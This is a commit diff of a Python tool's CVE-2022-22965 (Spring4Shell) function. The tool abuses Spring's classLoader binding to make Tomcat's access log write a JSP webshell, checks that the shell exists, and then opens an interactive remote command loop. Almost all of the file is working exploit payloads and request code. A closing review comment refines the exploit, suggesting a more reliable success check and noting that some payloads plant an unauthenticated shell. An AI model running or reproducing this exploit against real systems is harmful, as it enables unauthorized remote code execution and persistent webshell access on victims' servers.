

Update vul.py
AabyssZG authored Dec 28, 2023
1 parent ef391b3 commit 29f4e20
Showing 1 changed file with 24 additions and 14 deletions.
38 changes: 24 additions & 14 deletions inc/vul.py
Expand Up @@ -22,40 +22,50 @@ def CVE_2022_22965(url, proxies):
cprint("======开始对目标URL进行CVE-2022-22965漏洞利用======", "green")
Headers_1 = {
"User-Agent": random.choice(ua),
"prefix": "<%",
"suffix": "%>//",
"c": "Runtime",
"c1": "Runtime",
"c2": "<%",
"DNT": "1",
}
Headers_2 = {
"User-Agent": random.choice(ua),
"Content-Type": "application/x-www-form-urlencoded"
}
payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
data1 = payload_linux
data2 = payload_win
}
payload_linux = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_win = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22aabysszg%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_http = """?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
payload_other = """class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="""
file_date_data = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_"
getpayload = url + payload_http
try:
requests.packages.urllib3.disable_warnings()
requests.post(url, headers=Headers_1, data=data1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
requests.post(url, headers=Headers_2, data=file_date_data, verify=False)
requests.post(url, headers=Headers_2, data=payload_other, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
requests.post(url, headers=Headers_1, data=payload_linux, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
sleep(0.5)
requests.post(url, headers=Headers_1, data=data2, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
requests.post(url, headers=Headers_1, data=payload_win, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
sleep(0.5)
requests.get(getpayload, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
sleep(0.5)
test = requests.get(url + "tomcatwar.jsp", verify=False, proxies=proxies)
if (test.status_code == 200) and ('aabysszg' in str(test.text)):
cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "tomcatwar.jsp?pwd=aabysszg&cmd=whoami" ,"red")
requests.get(url, headers=Headers_1, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
test = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
test_again = requests.get(url + "shell.jsp", verify=False, proxies=proxies)
if (test.status_code == 500) or (test_again.status_code == 200):
cprint("[+] 存在编号为CVE-2022-22965的RCE漏洞,上传Webshell为:" + url + "shell.jsp?pwd=aabysszg&cmd=whoami" ,"red")
while 1:
Cmd = input("[+] 请输入要执行的命令>>> ")
if Cmd == "exit":
sys.exit(0)
url_shell = url + "tomcatwar.jsp?pwd=aabysszg&cmd={}".format(Cmd)
url_shell = url + "shell.jsp?pwd=aabysszg&cmd={}".format(Cmd)
r = requests.get(url_shell, verify=False, proxies=proxies)
resp = r.text
r_again = requests.get(url_shell, verify=False, proxies=proxies)
resp = r_again.text
result = re.findall('([^\x00]+)\n', resp)[0]
cprint(result ,"green")
else:
cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/tomcatwar.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
cprint("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n[/shell.jsp?pwd=aabysszg&cmd=命令] \n","yellow")
except KeyboardInterrupt:
print("Ctrl + C 手动终止了进程")
sys.exit()
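Review bot: The success check on L59 treats an HTTP 500 from `shell.jsp` as proof of exploitation, and the old `'aabysszg' in str(test.text)` content check was dropped, so any target that answers 500 for an unknown path is reported as vulnerable and the operator is dropped into the command loop. A safer oracle is to run a known command through the shell and look for its output, e.g. `test_again = requests.get(url + "shell.jsp?pwd=aabysszg&cmd=echo%20aabysszg", timeout=6, verify=False, proxies=proxies)` followed by `if test_again.status_code == 200 and 'aabysszg' in test_again.text:`. Two further issues in the new lines: `payload_http` and `payload_other` (L37–L38) omit the `if("aabysszg".equals(request.getParameter("pwd")))` guard that `payload_linux`/`payload_win` carry, so if their pattern is the one the access-log valve ends up writing, `shell.jsp` executes `cmd` for any unauthenticated client — use one guarded pattern throughout or document that the dropped file must be removed after the engagement; and `re.findall('([^\x00]+)\n', resp)[0]` on L71 raises IndexError when a command produces no output, which the `except KeyboardInterrupt` does not catch — use `matches = re.findall(r'([^\x00]+)\n', resp)` and print `matches[0] if matches else resp`. The new `requests.get` calls on L57, L58 and L69 also lack the `timeout=6` every other request in the hunk passes, so a stalled target hangs the tool, and `Cmd` on L66 is placed in the query string without `urllib.parse.quote`, so commands containing `&`, `#` or `+` are silently truncated or altered. `CVE_2022_22965` begins before this hunk and its remaining exception handling may continue past it.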
